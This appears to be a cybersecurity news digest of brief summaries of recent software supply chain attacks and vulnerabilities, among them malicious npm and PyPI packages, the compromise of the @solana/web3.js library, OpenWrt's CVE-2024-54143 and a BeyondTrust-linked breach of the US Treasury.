FlagThis

A newly discovered China-aligned APT group called PlushDaemon has been found conducting cyber espionage using a supply chain attack. The group is targeting a South Korean VPN provider and replacing legitimate software installers with malicious ones that deploy the SlowStepper malware. This malware has a large toolkit, programmed in C++, Python and Go, which can conduct espionage. The initial access vector is by hijacking legitimate software updates.

Researchers have identified critical BIOS/UEFI vulnerabilities in the Illumina iSeq 100 DNA gene sequencer. The device uses an outdated BIOS implementation with CSM mode enabled, lacking Secure Boot and standard firmware write protections. This allows attackers with system access to overwrite the firmware, potentially bricking the device or installing a persistent firmware implant. The vulnerabilities highlight significant supply chain security risks due to the re-use of commodity hardware and outdated firmware. This issue also underscores the need for stringent configuration management and integrity checking for devices handling genomic data. This shows that even devices in a non-traditional tech sector are vulnerable to attack.

Chinese state-sponsored threat actors compromised the US Treasury Department by exploiting a vulnerability in a third-party software provider, BeyondTrust. The attackers accessed employee workstations and exfiltrated unclassified documents. This incident highlights the risk associated with third-party dependencies and supply chain attacks. The attackers gained remote access, raising concerns about the security posture of government agencies. The affected systems were not immediately identified but were confirmed to be workstations.

Malicious npm packages are targeting Ethereum developers, impersonating Hardhat plugins to steal private keys and other sensitive data. These packages, with names similar to legitimate Hardhat plugins, are downloaded over 1,000 times, potentially backdooring production systems and causing financial losses. The attackers use Ethereum smart contracts to store and distribute Command & Control (C2) server addresses to compromised systems. The attack uses a supply chain vulnerability.

Malicious actors are weaponizing legitimate security testing tools by using OAST (Out-of-Band Application Security Testing) techniques within npm, PyPI, and RubyGems ecosystems. Attackers are using malicious packages in these ecosystems to exfiltrate data and establish command and control channels. This enables multi-stage attacks using seemingly legitimate infrastructure. These packages impersonate legitimate libraries to steal developer secrets.

Researchers have identified two malicious packages, zebo and cometlogger, on the Python Package Index (PyPI) repository. These packages are designed to steal sensitive information such as login credentials and social media accounts from compromised systems. The malicious code was actively downloaded by users. The incident highlights the increasing need for vigilance when using open-source software and the potential for supply chain attacks.

A supply chain attack has compromised open-source packages associated with rspack and vant, injecting cryptomining malware. The compromised packages had hundreds of thousands of weekly downloads, posing a significant threat to users of these projects. The affected version is 1.1.7. This event underscores the growing threat of supply chain attacks targeting open-source software projects. The vulnerability emphasizes the need for stronger security protocols in open-source ecosystems and for better vetting of dependencies.

A critical vulnerability (CVE-2024-54143) in OpenWrt’s Attended SysUpgrade (ASU) server allowed attackers to inject malicious firmware images during updates. The vulnerability exploited a truncated SHA-256 hash collision and a command injection flaw, putting many routers at risk. OpenWrt developers quickly addressed the vulnerability in updated releases. This attack highlights the criticality of securing the firmware update process and the risk of supply chain attacks affecting embedded devices.

A malicious PyPI package, ‘aiocpa’, disguised as a legitimate cryptocurrency client, was used to steal cryptocurrency wallet information. Attackers used a stealthy approach, publishing their own package instead of typosquatting. The malicious code was obfuscated using Base64 encoding and zlib compression; it exfiltrated sensitive data to a Telegram bot. This highlights the risk of malicious packages in software supply chains.

A supply chain attack compromised versions 1.95.6 and 1.95.7 of the @solana/web3.js npm library, a critical JavaScript tool used for Solana blockchain applications. Malicious code inserted into the library could steal private keys, potentially leading to cryptocurrency theft. The compromise affected numerous applications and individual wallets, highlighting the risks of software supply chain attacks in the cryptocurrency space. Developers are urged to upgrade or downgrade the library to avoid compromise.